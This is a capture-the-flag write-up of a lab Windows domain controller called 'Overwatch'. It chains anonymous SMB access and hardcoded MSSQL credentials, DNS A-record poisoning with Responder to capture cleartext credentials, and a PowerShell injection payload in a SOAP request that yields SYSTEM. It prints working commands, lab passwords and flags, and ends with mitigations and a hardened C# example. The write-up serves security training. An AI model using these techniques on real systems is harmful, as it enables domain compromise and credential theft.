Difficulty: Medium | OS: Windows (Server 2022) | Release: January 2026
CVEs: None (misconfiguration chain)
Author: jkonpc | February 25, 2026
Executive Summary
Overwatch is a medium-difficulty Windows Active Directory machine featuring a .NET WCF monitoring service with hardcoded MSSQL credentials and an unsanitized PowerShell execution path. Exploitation chains through anonymous SMB share access for source code recovery, DNS record poisoning of a dead MSSQL linked server to capture cleartext credentials, and SOAP command injection in a SYSTEM-level WCF service for full domain controller compromise.
| Property | Value |
|---|---|
| Target IP | 10.129.244.81 |
| Open Ports | 53, 88, 135, 139, 389, 445, 3389, 5985, 6520 (MSSQL), 8000 (WCF/localhost) |
| Web Application | WCF MonitoringService (basicHttpBinding, port 8000) |
| User Flag | f70669242ab103f589db691e340cb2f5 |
| Root Flag | 187de925dc90f84f70d458bf3946a1f2 |
Attack Chain Overview
- Initial Foothold (sqlsvc): Anonymous SMB access to software$ share → .NET binary decompilation → hardcoded MSSQL credentials (sqlsvc:TI0LKcfHzZw1Vv)
- Credential Capture (sqlmgmt): MSSQL linked server SQL07 with no DNS record → DNS A record poisoning via authenticated LDAP → Responder captures cleartext MSSQL creds (sqlmgmt:bIhBbzMMnB82yx)
- User Access (sqlmgmt): WinRM shell as sqlmgmt → user flag
- Privilege Escalation (SYSTEM): SOAP command injection via WCF KillProcess method → PowerShell execution as SYSTEM → root flag
Phase 1: Reconnaissance
Service Enumeration
```text
$ nmap -sC -sV 10.129.244.81
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: overwatch.htb)
445/tcp  open  microsoft-ds?
3389/tcp open  ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
|   NetBIOS_Computer_Name: S200401
|   DNS_Domain_Name: overwatch.htb
|   DNS_Computer_Name: S200401.overwatch.htb
|   Product_Version: 10.0.20348
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
```
A full port scan (-p-) reveals MSSQL on a non-standard port:
```text
$ nmap -sC -sV 10.129.244.81 -p-
6520/tcp open  ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
9389/tcp open  mc-nmf   .NET Message Framing
```
| Discovery | Detail |
|---|---|
| Hostname | S200401.overwatch.htb |
| Domain | overwatch.htb |
| OS | Windows Server 2022 Build 20348 |
| MSSQL | SQL Server 2022 RTM on port 6520 |
| SMB Signing | Enabled and required |
SMB Enumeration
Anonymous/Guest authentication is enabled. The anonymous user has Guest-level access and reveals a hidden share:
```text
$ nxc smb 10.129.244.81 -u 'anonymous' -p '' --shares
Share      Permissions  Remark
-----      -----------  ------
ADMIN$                  Remote Admin
C$                      Default share
IPC$       READ         Remote IPC
NETLOGON                Logon server share
software$  READ
SYSVOL                  Logon server share
```
The software$ share contains a Monitoring directory with a .NET application:
```text
$ smbclient //10.129.244.81/software$ -U 'anonymous' -N -c 'cd Monitoring; ls'
EntityFramework.dll
EntityFramework.SqlServer.dll
Microsoft.Management.Infrastructure.dll
overwatch.exe            9728  Fri May 16 20:19:24 2025
overwatch.exe.config     2163  Fri May 16 20:02:30 2025
overwatch.pdb           30208  Fri May 16 20:19:24 2025
System.Data.SQLite.dll
System.Management.Automation.dll
```
Source Code Analysis
The binary is a small (9KB) .NET 4.7.2 application with a PDB — decompilation produces near-source-quality output. The accompanying DLLs reveal functionality: Entity Framework + SQLite for data access, System.Management.Automation for PowerShell execution, and WMI via Microsoft.Management.Infrastructure.
The application config (overwatch.exe.config) exposes a WCF SOAP service:
```xml
<service name="MonitoringService">
  <host>
    <baseAddresses>
      <add baseAddress="http://overwatch.htb:8000/MonitorService" />
    </baseAddresses>
  </host>
  <endpoint address="" binding="basicHttpBinding" contract="IMonitoringService" />
  <endpoint address="mex" binding="mexHttpBinding" contract="IMetadataExchange" />
</service>
```
Decompilation reveals three critical findings:
1. Hardcoded MSSQL credentials:
```csharp
private readonly string connectionString = "Server=localhost;Database=SecurityLogs;User Id=sqlsvc;Password=TI0LKcfHzZw1Vv;";
```
2. PowerShell command injection in KillProcess:
```csharp
public string KillProcess(string processName)
{
    // caller-controlled processName is concatenated straight into script text
    string text = "Stop-Process -Name " + processName + " -Force";
    // ...
    val2.get_Commands().AddScript(text);
    val2.get_Commands().Add("Out-String");
    Collection<PSObject> collection = val2.Invoke();
    // ...
}
```
No input sanitization — the processName parameter is concatenated directly into a PowerShell command and executed via System.Management.Automation.Runspaces.
3. SQL injection in LogEvent:
```csharp
SqlCommand val2 = new SqlCommand("INSERT INTO EventLog (Timestamp, EventType, Details) VALUES (GETDATE(), '" + type + "', '" + detail + "')", val);
```
String concatenation into SQL queries, though this is only exploitable server-side.
| Finding | Detail |
|---|---|
| WCF Endpoint | http://overwatch.htb:8000/MonitorService |
| MSSQL Credentials | sqlsvc:TI0LKcfHzZw1Vv |
| Injection Vector | KillProcess — unsanitized PowerShell execution |
| Debug Mode | includeExceptionDetailInFaults="True" |
Phase 1: Exploitation — DNS Poisoning via Linked Server
MSSQL Enumeration
The sqlsvc credentials are valid against SMB and MSSQL (port 6520), but the account has minimal SQL privileges — no sysadmin role and only CONNECT SQL and VIEW ANY DATABASE permissions:
```text
$ sqsh -S 10.129.244.81:6520 -U 'overwatch\sqlsvc' -P 'TI0LKcfHzZw1Vv'
1> SELECT IS_SRVROLEMEMBER('sysadmin')
2> go
0
```
However, a linked server is configured:
```text
1> EXEC sp_linkedservers
2> go
SRV_NAME            SRV_PRODUCT
S200401\SQLEXPRESS  SQL Server
SQL07               SQL Server
```
Attempting to query SQL07 fails — the hostname does not resolve:
```text
1> SELECT * FROM OPENQUERY(SQL07, 'SELECT 1')
2> go
Named Pipes Provider: Could not open a connection to SQL Server [53].
```
DNS Record Poisoning
DNS confirms SQL07.overwatch.htb returns NXDOMAIN:
```text
$ dig @10.129.244.81 SQL07.overwatch.htb
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN
```
By default, authenticated domain users can create new DNS A records via LDAP. Using dnstool.py from krbrelayx, a poisoned A record is added pointing SQL07 to the attacker’s IP:
```text
$ python3 krbrelayx/dnstool.py -u 'overwatch.htb\sqlsvc' -p 'TI0LKcfHzZw1Vv' \
    -a add -r SQL07.overwatch.htb -d 10.10.16.23 10.129.244.81
[+] Bind OK
[+] LDAP operation completed successfully
```
Credential Capture
With Responder listening on the attacker machine, the linked server query is triggered from sqsh:
```text
$ sudo responder -I tun0
```
```text
1> SELECT * FROM OPENQUERY(SQL07, 'SELECT 1')
2> go
```
The MSSQL service authenticates to the attacker in cleartext:
```text
[MSSQL] Cleartext Client   : 10.129.244.81
[MSSQL] Cleartext Hostname : SQL07 ()
[MSSQL] Cleartext Username : sqlmgmt
[MSSQL] Cleartext Password : bIhBbzMMnB82yx
```
| Credential | Value |
|---|---|
| Username | sqlmgmt |
| Password | bIhBbzMMnB82yx |
| Source | MSSQL linked server authentication (cleartext) |
Phase 2: User Access
WinRM Shell
The sqlmgmt account has Remote Management Users group membership:
```text
$ nxc winrm 10.129.244.81 -u 'sqlmgmt' -p 'bIhBbzMMnB82yx'
WINRM  10.129.244.81  5985  S200401  [+] overwatch.htb\sqlmgmt:bIhBbzMMnB82yx (Auth Success)
```
```text
$ evil-winrm -i 10.129.244.81 -u 'sqlmgmt' -p 'bIhBbzMMnB82yx'
*Evil-WinRM* PS C:\Users\sqlmgmt\Desktop> type user.txt
f70669242ab103f589db691e340cb2f5
```
The account has no special privileges — no SeImpersonate, no local admin membership, and only standard domain user groups:
| Attribute | Value |
|---|---|
| Domain Groups | Domain Users |
| Local Groups | Remote Management Users |
| Privileges | SeMachineAccountPrivilege, SeChangeNotifyPrivilege |
Phase 3: Privilege Escalation
Identifying the Vector
The WCF monitoring service is listening on port 8000 bound to all interfaces, running under PID 4 (SYSTEM):
```text
*Evil-WinRM* PS> netstat -ano | findstr 8000
TCP    0.0.0.0:8000    0.0.0.0:0    LISTENING    4
```
Port 8000 was not reachable externally (filtered by firewall), but is accessible from the local machine. The WSDL confirms the service is live:
```text
*Evil-WinRM* PS> Invoke-WebRequest -Uri "http://localhost:8000/MonitorService?wsdl" -UseBasicParsing
StatusCode: 200
```
Exploitation — SOAP Command Injection
The KillProcess method constructs the PowerShell command as:
```text
Stop-Process -Name <input> -Force
```
Injecting `test; whoami #` produces:
```text
Stop-Process -Name test; whoami # -Force
```
The semicolon terminates the first command, whoami executes, and # comments out the trailing -Force.
```powershell
$body = @"
<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">
  <s:Body>
    <KillProcess xmlns="http://tempuri.org/">
      <processName>test; whoami #</processName>
    </KillProcess>
  </s:Body>
</s:Envelope>
"@
$response = Invoke-WebRequest -Uri "http://localhost:8000/MonitorService" `
    -Method POST -ContentType "text/xml" -Body $body `
    -Headers @{SOAPAction='"http://tempuri.org/IMonitoringService/KillProcess"'} `
    -UseBasicParsing
$response.Content
```
```xml
<KillProcessResult>nt authority\system</KillProcessResult>
```
Root Flag
```xml
<processName>test; type C:\Users\Administrator\Desktop\root.txt #</processName>
```
```xml
<KillProcessResult>187de925dc90f84f70d458bf3946a1f2</KillProcessResult>
```
Root Flag: 187de925dc90f84f70d458bf3946a1f2
Lessons Learned
Hardcoded Credentials in Distributed Binaries: The monitoring application shipped with plaintext MSSQL credentials in source code and was distributed via an SMB share accessible to anonymous users. Any attacker with network access could recover the credentials through decompilation. Service credentials should be managed through environment variables, Windows Credential Manager, or secrets management systems — never embedded in application code, especially when the binary is stored on a readable share.
Authenticated DNS Record Creation in Active Directory: By default, any authenticated domain user can create new DNS A records in AD-integrated DNS zones. This is a design feature, not a bug — but it becomes a critical attack vector when applications reference hostnames that don’t resolve. The SQL07 linked server was configured to connect to a hostname with no DNS entry, allowing any domain user to claim it. Mitigations include restricting DNS record creation via ACLs, removing stale linked server configurations, and auditing DNS zones for missing records that could be hijacked.
Cleartext MSSQL Linked Server Authentication: The linked server connection transmitted credentials in cleartext because the connection used SQL Server authentication over an unencrypted channel. When the attacker poisoned DNS to redirect the connection, Responder captured the credentials without needing to crack any hash. Linked servers should use Windows integrated authentication (Kerberos) where possible, and connections should enforce TLS encryption to prevent credential interception even if DNS is compromised.
Unsanitized Input in PowerShell Execution: The WCF KillProcess method concatenated user input directly into a PowerShell command string — a textbook command injection vulnerability. The System.Management.Automation namespace provides safe alternatives: AddCommand() with AddParameter() constructs parameterized commands that prevent injection, similar to parameterized SQL queries. The use of AddScript() with string concatenation should be treated with the same suspicion as string-concatenated SQL.
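The parameterized alternative this lesson describes, as an added example that is not the Overwatch binary's code: the concatenation pattern from the decompiled KillProcess beside a version that binds the name with AddCommand/AddParameter and allow-lists it first. Class and method names are assumed for illustration.

```csharp
// Added illustration, not code from overwatch.exe.
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Text.RegularExpressions;

public class MonitoringServiceExample
{
    // VULNERABLE: the caller's string becomes script text, so an input of
    // "test; whoami #" runs as "Stop-Process -Name test; whoami # -Force".
    public string KillProcessVulnerable(string processName)
    {
        string script = "Stop-Process -Name " + processName + " -Force";
        using (PowerShell ps = PowerShell.Create())
        {
            ps.AddScript(script);          // parsed and executed as PowerShell code
            ps.AddCommand("Out-String");
            Collection<PSObject> result = ps.Invoke();
            return result.Count > 0 ? result[0].ToString() : string.Empty;
        }
    }

    // Allow-list: a process name, nothing that the PowerShell parser could treat as syntax.
    private static readonly Regex ProcessNamePattern = new Regex(@"^[A-Za-z0-9_.\-]{1,64}$");

    // HARDENED: the value is bound to the -Name parameter as data and is never
    // parsed as script, the same way a parameterized SQL query treats its arguments.
    public string KillProcessHardened(string processName)
    {
        if (processName == null || !ProcessNamePattern.IsMatch(processName))
            throw new ArgumentException("Invalid process name.", nameof(processName));

        using (PowerShell ps = PowerShell.Create())
        {
            ps.AddCommand("Stop-Process")
              .AddParameter("Name", processName)   // bound as a parameter value
              .AddParameter("Force");              // switch parameter, no string building
            ps.AddCommand("Out-String");
            Collection<PSObject> result = ps.Invoke();

            // Return a fixed message rather than the raw error, so the service does not
            // leak internals the way includeExceptionDetailInFaults="True" does.
            if (ps.HadErrors)
                return "Stop-Process failed";
            return result.Count > 0 ? result[0].ToString() : string.Empty;
        }
    }
}
```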
| Tool | Purpose |
|---|---|
| nmap | Service enumeration and full port scanning |
| netexec (nxc) | SMB, WinRM, MSSQL, and RDP authentication testing |
| smbclient | SMB share enumeration and file retrieval |
| ilspycmd | .NET binary decompilation |
| sqsh | MSSQL interactive query execution |
| dnstool.py (krbrelayx) | Active Directory DNS record poisoning via LDAP |
| Responder | NTLM/cleartext credential capture |
| evil-winrm | WinRM shell access |
| Invoke-WebRequest | SOAP endpoint interaction for command injection |
CVE Reference
| CVE | Component | Description |
|---|---|---|
| N/A | overwatch.exe | Hardcoded MSSQL credentials in .NET binary distributed via anonymous SMB share |
| N/A | AD DNS | Authenticated users can create DNS A records — enables linked server hijacking |
| N/A | MSSQL Linked Server | Cleartext SQL authentication to unresolvable hostname — credential capture via DNS poisoning |
| N/A | WCF KillProcess | PowerShell command injection via unsanitized SOAP parameter in SYSTEM-context service |